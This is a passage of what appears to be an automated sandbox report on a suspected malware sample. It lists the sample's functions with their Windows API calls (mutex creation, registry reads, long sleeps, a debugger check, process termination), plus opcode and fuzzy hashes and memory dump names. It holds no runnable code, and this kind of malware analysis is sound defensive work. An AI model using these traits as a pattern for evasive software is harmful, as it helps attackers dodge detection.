Opcode Fuzzy Hash: e07aad22c0835f474f0b55176d07b9e853e81e79cd40ddab93fed495f696d815
Instruction Fuzzy Hash: B42127717101045BEB18CB78DDC9BADBBA2DF82314F24861CF0969B3E6DB7D99818B50

Uniqueness

Uniqueness Score: -1.00%

Function 00CB647B Relevance: 1.6, APIs: 1, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB647E
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: 3c7dc2b102ae0e392d915df9f889770c6f797818b65b60432ffd751a628f5a6b
Instruction ID: de55773976cd30207e50ebfe64333a9c92f826e5035e6c8c75632cca55a10fd7
Opcode Fuzzy Hash: 3c7dc2b102ae0e392d915df9f889770c6f797818b65b60432ffd751a628f5a6b
Instruction Fuzzy Hash: 3B2107317001045BEB28CB78DD85BADBB62EF81314F20461CE0969B3D6CB7DD9858B40

Uniqueness

Uniqueness Score: -1.00%

Function 00CB659B Relevance: 1.6, APIs: 1, Instructions: 94synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB659E
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: 4586e372c8270ba0ecff17bc604ecf5576abcdad40b7178b2755933e23f8b0c0
Instruction ID: 7170611a0c6a7bf0faa0dc985e0c5b0cc88b1469eddca81e0c9b550f04483b35
Opcode Fuzzy Hash: 4586e372c8270ba0ecff17bc604ecf5576abcdad40b7178b2755933e23f8b0c0
Instruction Fuzzy Hash: BE210271B001045BEB288BB8DD85BEDBB62DF81314F24861CF495DB7DACB7E99818B40

Uniqueness

Uniqueness Score: -1.00%

Function 00CB66BB Relevance: 1.6, APIs: 1, Instructions: 93synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB66BE
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: 2702f60fcdb557fe27bc9f84301325cd1e0feb8df585a117662436703ef47246
Instruction ID: c544974a5b1eef76f12dcd9d4ec647b45f5fb0673a9952e18ea353e0e4eb8b44
Opcode Fuzzy Hash: 2702f60fcdb557fe27bc9f84301325cd1e0feb8df585a117662436703ef47246
Instruction Fuzzy Hash: DB2105727101045BEF188B68DD89BADBB62DF81318F20861CF0919B3D6DB7D89818740

Uniqueness

Uniqueness Score: -1.00%

Function 00CB67DB Relevance: 1.6, APIs: 1, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB67DE
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: 92d96e9c8d8f9f0847d1254f7612eb5ea9495d96965317a5c399ae12a03c24d7
Instruction ID: 15350a6e27291cadc479adae6c0f745e2eabdc152f35500aef1514893e6cd3d4
Opcode Fuzzy Hash: 92d96e9c8d8f9f0847d1254f7612eb5ea9495d96965317a5c399ae12a03c24d7
Instruction Fuzzy Hash: D2210571B101049BEF189BB8DD85BADBA62EF81714F24861CF0919B3D6CB7E89819741

Uniqueness

Uniqueness Score: -1.00%

Function 00CB68FB Relevance: 1.6, APIs: 1, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB68FE
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: 440b20935a5b32a2b9f8ca7563fcc706180b660d8022da47852887a136d85d1b
Instruction ID: 212f5d99c1a5f4fceaf21d9cb74698e78013c7747ed72e6499cc892bd131f533
Opcode Fuzzy Hash: 440b20935a5b32a2b9f8ca7563fcc706180b660d8022da47852887a136d85d1b
Instruction Fuzzy Hash: 96212971B001045BDB189B79DD85B9DBB62DF86314F24861CF091DB3D6CB7E89819740

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6A1B Relevance: 1.6, APIs: 1, Instructions: 90synchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB6A1E
CreateMutexA.KERNELBASE(00000000,00000000,00CE4194), ref: 00CB6CD8
GetLastError.KERNEL32 ref: 00CB6CDE

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesCreateErrorFileLastMutex
String ID:
API String ID: 3621940766-0
Opcode ID: d182483731e96474b0ba525474cdc86ae5d2e89bfc5942c1371227ee1b11422c
Instruction ID: 02ddb7592872a859b1d9da637dabd6bd2090c9ff1c45fb793f0008ddaa15b5d9
Opcode Fuzzy Hash: d182483731e96474b0ba525474cdc86ae5d2e89bfc5942c1371227ee1b11422c
Instruction Fuzzy Hash: F521F3317101045BEF189BB8DD85BADBA62DF81314F24C61CE495AB2D6CB7D8E81A740

Uniqueness

Uniqueness Score: -1.00%

Function 00CB6B3B Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 00CB6B3E

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6e9ecc913b05dd569134749bb2e9fd475f14428afe4978555ba90cdd0106735b
Instruction ID: 9696a0703b48e9a21a9edf4054d64655f6d7cbc8c7d994101a77c26b2d583da1
Opcode Fuzzy Hash: 6e9ecc913b05dd569134749bb2e9fd475f14428afe4978555ba90cdd0106735b
Instruction Fuzzy Hash: 362124327001085BEB188B78DDC9BADBA72DF86314F24861CE495DB7D6DB7D89C19B40

Uniqueness

Uniqueness Score: -1.00%

Function 00CC87AF Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00CC87E9

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: f54f0201f44c64946252839d8194659db5b6ffef4bbdcbc1ef0ee7f54efdf712
Instruction ID: 59ac3cb5178d3dfcdc91c511d7971af583806515f832a7ddec92ec9eedd1d67e
Opcode Fuzzy Hash: f54f0201f44c64946252839d8194659db5b6ffef4bbdcbc1ef0ee7f54efdf712
Instruction Fuzzy Hash: BA111575A0420AAFCB05DF58E941E9B7BF5EF49314F0440A9F809AB252DA70EA15CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CC50E4 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC514B

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 529a0e24dde19635c73a1964b7abab97d8e277f8b11429d641730b403236f31c
Instruction ID: d917db3bd374d963517bba33c73790f442e60617a8ecd250394e857d452734c9
Opcode Fuzzy Hash: 529a0e24dde19635c73a1964b7abab97d8e277f8b11429d641730b403236f31c
Instruction Fuzzy Hash: F5018871C04119AECF01ABA4DC05F9D7BF4AB04310F14416EF428E21D1D6309A80D784

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE632 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CCE695

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 00110a33c614953caa58d168d93d9cae1daaf8921c40e879f3a90e6df9376c32
Instruction ID: 1c353b0a206139695d64da17a3dfc6b0959cca9e509dd56b7d66df61832cee8d
Opcode Fuzzy Hash: 00110a33c614953caa58d168d93d9cae1daaf8921c40e879f3a90e6df9376c32
Instruction Fuzzy Hash: F6012C72C1015DAFCF01AFA8DC01EEEBFB5AB08314F144569F924A21A1E6318A20AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CC8E3A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00CC0FAC,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC8E6C

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aee067a9efe351fe397f7f5467d9590a47da3755b2ad3a36e258a3b68c9b7813
Instruction ID: 93aa1743d5a6f8b5f0376faf227c3c0de0d2983d7095b468636a98e754665b34
Opcode Fuzzy Hash: aee067a9efe351fe397f7f5467d9590a47da3755b2ad3a36e258a3b68c9b7813
Instruction Fuzzy Hash: D8E0223A100234AAEA3127B6CC00F6F374CCF617B0F08022CEC249A090CF30DD0592E5

Uniqueness

Uniqueness Score: -1.00%

Function 00CCE379 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00CCE769,?,?,00000000,?,00CCE769,00000000,0000000C), ref: 00CCE396

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1b7467b072e30f96b01efb1acb448a000c46124aa8d1c481b90153122f8e6e39
Instruction ID: 5137405a1d2fc29cee42738f825c75fc091fd0c12984e0e067612193554cc149
Opcode Fuzzy Hash: 1b7467b072e30f96b01efb1acb448a000c46124aa8d1c481b90153122f8e6e39
Instruction Fuzzy Hash: 83D06C3200010DFBDF028F84DC06EDE3BAAFB48754F014000BA1856020C732E861AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0FE0 Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

Sleep.KERNELBASE(0002BF20), ref: 00CC102B

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: ed7e8c7a9f83d6dfbc2167365dd3851b82c5a5d7e35bf05438b8c83ac764d9d3
Instruction ID: efb2dce1d8a81c0f18aa1fe47c789935bf0120cbc960312cd5b37e0b9b715621
Opcode Fuzzy Hash: ed7e8c7a9f83d6dfbc2167365dd3851b82c5a5d7e35bf05438b8c83ac764d9d3
Instruction Fuzzy Hash: 6EE0C226F0002023081436BF9C13A2D3A110AA3B90B8C019CFC4B2B3E7EC410C5613D3

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0F90 Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
Part of subcall function 00CB2B70: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CE9
Part of subcall function 00CB2B70: RegCloseKey.KERNELBASE(?,?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CF2

Sleep.KERNELBASE(0002BF20), ref: 00CC0FDB

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID:
API String ID: 4119054056-0
Opcode ID: 89418f1f76da51351f61f0fddb1c47585c8ceccbe1fc7ddfc4f1050aca9f5f75
Instruction ID: 5d376049ac215656ccab81da643ab54d3a65ad034a9d7e20048ca008866829ed
Opcode Fuzzy Hash: 89418f1f76da51351f61f0fddb1c47585c8ceccbe1fc7ddfc4f1050aca9f5f75
Instruction Fuzzy Hash: 6AE0C226F0046023080436BE9C17A2D3A1109A3B90B8D01ACEC472B3E7EC411D5623D3

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CD0918 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00CD0A93

Strings

1#INF, xrefs: 00CD1C4E
1#QNAN, xrefs: 00CD1C31
1#IND, xrefs: 00CD1C23
1#SNAN, xrefs: 00CD1C2A

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a4d7a49f8239b604ef93da03e8ed9c0be5ba99440948dfb89dd1debf7257f0bd
Instruction ID: 9bd79e31e8abe0d932dee578e69e7ebe544803cb70831c9f2a4ed2e229485e8b
Opcode Fuzzy Hash: a4d7a49f8239b604ef93da03e8ed9c0be5ba99440948dfb89dd1debf7257f0bd
Instruction Fuzzy Hash: E5C21671E046289FDB24CE28DD407EAB3B5EB88304F1941EBD95DA7340E775AE819F40

Uniqueness

Uniqueness Score: -1.00%

Function 00CC6E28 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CC6F20
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CC6F2A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CC6F37

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d8101a23085384494799bc11ef8473e8ceb26ae35dc4f7fd8204e42115d8ab98
Instruction ID: b40e55a64338ccbe88298019d9d768e0240d3fec67fc92b08d53c7d8f8e907ac
Opcode Fuzzy Hash: d8101a23085384494799bc11ef8473e8ceb26ae35dc4f7fd8204e42115d8ab98
Instruction Fuzzy Hash: E131C375901228EBCB21DF68D989BCDBBB8BF08310F5041EAE41CA7251E7709F859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00CC4AB1 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00CC814B,?,00CC4AB0,00CC5036,?,00CC814B,00CC5036,00CC814B,00000003), ref: 00CC4AD3
TerminateProcess.KERNEL32(00000000,?,00CC4AB0,00CC5036,?,00CC814B,00CC5036,00CC814B,00000003), ref: 00CC4ADA
ExitProcess.KERNEL32 ref: 00CC4AEC

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b30ad432fa345ccc3ee5148d960d02e08485692668966484a2500f13570cd20d
Instruction ID: 71a45270baadd542aaceea4018a0b9ca72d564b4e11916a819db907cba6e226b
Opcode Fuzzy Hash: b30ad432fa345ccc3ee5148d960d02e08485692668966484a2500f13570cd20d
Instruction Fuzzy Hash: 53E04631041108EBCB156B64DC1DF5E3B39FB00381F004019F81686231CB39EE91EB85

Uniqueness

Uniqueness Score: -1.00%

Function 00CD0480 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83538014b011fe5aadaf25438fe6a05ee24b20f279c4ff36abc7e32ec3dcc3d
Instruction ID: fe18d335e62670bc5314f7c1232e7cbb3f840594d96164c9f94480533082bfd2
Opcode Fuzzy Hash: b83538014b011fe5aadaf25438fe6a05ee24b20f279c4ff36abc7e32ec3dcc3d
